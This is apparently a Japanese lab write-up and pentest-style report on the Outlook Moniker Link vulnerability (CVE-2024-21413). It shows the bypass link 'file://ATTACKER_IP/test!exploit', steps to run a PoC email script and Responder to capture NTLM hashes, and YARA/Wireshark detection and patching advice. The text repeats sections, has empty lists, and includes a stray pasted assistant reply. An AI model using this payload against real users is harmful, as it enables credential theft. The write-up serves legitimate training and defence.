
2024年2月13日、MicrosoftはMicrosoft Outlookの深刻なセキュリティ脆弱性を公開しました。この脆弱性はCVE-2024-21413として識別され、Moniker Link Vulnerabilityとして知られています。この脆弱性により、攻撃者はOutlookのProtected Viewメカニズムを回避することができます。
2024年2月13日、MicrosoftはMicrosoft Outlookの深刻なセキュリティ脆弱性を公開しました。その識別子はCVE-2024-21413で、Moniker Link脆弱性として知られています。この脆弱性により、攻撃者はOutlookのProtected Viewメカニズムをバイパスできます。

素晴らしい 👍 以下が完全な翻訳 + Penetration Testing (PT) レポート形式の表現です。プロフェッショナルで明確な日本語で記述しています。 ご依頼の通り – 翻訳と表現のみです。 回答、スクリーンショット、補完はご自身で追加してください。必要に応じて、後ほどお手伝いします。
2024年2月13日、MicrosoftはMicrosoft Outlookの深刻なセキュリティ脆弱性を公開しました。その識別子は CVE-2024-21413で、Moniker Link脆弱性として知られています。
この脆弱性により、攻撃者は特別なリンク(Moniker Link)を使用してOutlookのProtected Viewメカニズムをバイパスし、被害者のOutlookクライアントに認証情報(NTLMハッシュ) を攻撃者が制御するサーバーに送信させることができます。ファイルの実行や効果的なセキュリティ警告は必要ありません。
この脆弱性は認証情報の漏洩につながる可能性があり、理論的にはリモートコード実行(RCE) の可能性もあります。
| パラメータ | 値 |
|---|---|
| 脆弱性ID | CVE-2024-21413 |
| 公開日 | 2024年2月13日 |
| 発見者 | Haifei Li – Check Point Research |
| 影響 | 認証情報漏洩 + 潜在的なRCE |
| 深刻度 | Critical |
| 攻撃の複雑さ | 低 |
| CVSSスコア | 9.8 |
| 公式リンク | https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413 |
この脆弱性は以下のバージョンに影響します:
(脆弱性の説明)

Microsoft OutlookはHTML形式のメール表示や、http://、https://などのさまざまなリンク解析をサポートしています。さらに、OutlookはMoniker Linksと呼ばれる特別なリンクもサポートしており、これによりアプリケーションの起動やOS上の外部リソースへのアクセスが可能になります。
通常の状態では、外部アプリケーションを起動したりシステムリソースにアクセスするリンク(file://リンクなど)がメールに含まれている場合、OutlookのProtected Viewセキュリティメカニズムが作動します。このメカニズムはセキュリティ警告を表示し、コード実行、マクロ、外部ネットワークリソースへのアクセスなどの危険な操作をブロックします。
しかし、Outlook(CVE-2024-21413)に脆弱性が見つかり、Moniker Linkタイプのリンクを簡単に操作することでProtected Viewメカニズムをバイパスできることが判明しました。
発見内容 (Findings)
テストの結果、次のような通常のリンク:
file://ATTACKER_IP/test
を使用すると、OutlookはSMBプロトコルを使用してネットワークリソースにアクセスしようと試みますが、この試みはProtected Viewによってブロックされます。
一方、リンクに特殊文字!と追加のテキスト文字列が含まれている場合、例:
file://ATTACKER_IP/test!exploit
OutlookはProtected Viewを起動せず、リモートサーバーへの認証試行を行います。
この試行中に:
重要な点は、リモート共有が実際に存在する必要はなく、認証試行はどのみち行われることです。
影響 (Impact)
この脆弱性により、攻撃者は以下を可能にします:
さらに、Moniker LinksはWindowsのCOM(Component Object Model)メカニズムを使用するため、理論的にはリモートコード実行(RCE)が可能です。ただし、テスト時点では、この脆弱性を利用した実際のRCEを実現する公開されたProof of Conceptは存在しません。
脆弱性の悪用 (Exploitation)
攻撃では、被害者に前のタスクで示したようなMoniker Linkを含むメールが送信されます。 攻撃者の目的は、OutlookのProtected ViewメカニズムをバイパスするMoniker Linkを含むメールを作成し、被害者がリンクをクリックするとすぐに、被害者のOutlookクライアントが攻撃者のマシンからファイルを読み込もうとするようにすることです。この操作により、被害者のnetNTLMv2ハッシュが送信され、攻撃者にキャプチャされます。
攻撃を実行する前に、デモ用に作成された(GitHubでも入手可能な)Proof of Concept(PoC)を確認します。
作成者:CMNatic | https://github.com/cmnatic バージョン:1.0 | 19/02/2024
このコードはPython言語を使用し、悪意のあるMoniker Linkを含むHTMLメールを送信します。
PoCの説明
PoCは:
実際のシナリオでは、攻撃者が制御するSMTPサーバーが必要です(このルームではサーバーはすでに提供されています)。
ハッシュキャプチャ用リスナー – Responder
メール送信後、攻撃者のマシンでResponderというリスナーツールを起動し、SMBリクエストをキャプチャします。
THM AttackBoxでは、インターフェース名はens5です:
responder -I ens5
ResponderはSMB、LLMNR、NBT-NSリクエストをリッスンし、認証情報のキャプチャを可能にします。
被害者マシンの起動
スプリットスクリーンウィンドウから被害者マシンを起動します
Outlookを起動します
「サインインしない、またはアカウントを作成しない」オプションを選択します
プロダクトキー入力ウィンドウを閉じます
被害者のメールボックスはあらかじめ設定されています
エクスプロイトの実行
AttackBoxで:
exploit.pyという新しいファイルを作成します
PoCコードを貼り付けます
実行前に調整が必要です:
Moniker Link内の攻撃者マシンのIPアドレスを更新します(12行目)
MAILSERVERの値を次のアドレスに置き換えます:
10.64.165.67
その後、実行します:
python3 exploit.py
パスワードの入力を求められたら、次のように入力します:
attacker
操作が成功すると、次のメッセージが表示されます:
Email delivered
結果
被害者マシンでメールを開き、「Click me」リンクをクリックした後:
攻撃は正常に完了しました。

検出 (Detection)
YARA
Florian Rothによって、Moniker Link内にfile:\\要素を含むメールを検出するためのYARAルールが作成されました。これはCVE-2024-21413の悪用試行を示す可能性があります。
YARAルールの例(ルームに表示):
ルールはメールの一般的な特性(Subject:、Received:など)を検索します
さらに、UNCパス(\)にファイル拡張子と末尾の!文字(Protected Viewバイパスの特性)を含むfile://リンクの疑わしいパターンを検索します
(コード自体は原文のまま)
Wireshark
さらに、Wiresharkのパケットキャプチャで、被害者マシンから攻撃者マシンへのSMBリクエストを確認できます。
リクエスト中:
緩和策 (Remediation)
Microsoftは、2月のPatch Tuesdayアップデートの一環として、この脆弱性を修正するセキュリティアップデートを含めました。 関連するKB記事のリストは、OfficeバージョンごとにMicrosoftの公式リンクで確認できます。
Microsoft Officeを以下の方法でアップデートすることを強く推奨します:
さらに、すべてのシステムにアップデートが適用されるまでは、基本的な情報セキュリティポリシーの実施、特にユーザーの意識向上が重要です。例えば:
この脆弱性はOutlookのProtected Viewメカニズムをバイパスするため、Outlookの設定のみでこの攻撃をブロックすることはできません。
また、ほとんどの組織ではSMBプロトコルを完全にブロックすることは推奨されません。このプロトコルはネットワークリソースやファイル共有へのアクセスに不可欠だからです。ただし、組織のポリシーやネットワーク構造に応じて、ファイアウォールレベルでのブロックや制限を実装できる場合があります。
緩和策 (Remediation)
Microsoftは、2月のPatch Tuesdayアップデートの一環として、この脆弱性に対するセキュリティ修正を含めました。 関連するKB記事のリストは、Officeバージョンに応じてMicrosoftの公式リンクで確認できます。 Microsoft Officeを以下の方法でアップデートすることを強く推奨します:
さらに、すべてのシステムにアップデートが適用されるまでは、基本的な情報セキュリティポリシーの実施、特にユーザーの意識向上が重要です。例えば:
この脆弱性はOutlookのProtected Viewメカニズムをバイパスするため、Outlook自体の設定変更によって攻撃を防ぐことはできません。
また、ほとんどの組織ではSMBプロトコルを完全にブロックすることは推奨されません。このプロトコルはファイル共有やネットワークリソースへのアクセスに不可欠だからです。ただし、組織のセキュリティポリシーとネットワーク構造に応じて、ファイアウォールレベルでの制限やブロックを実装できる場合があります。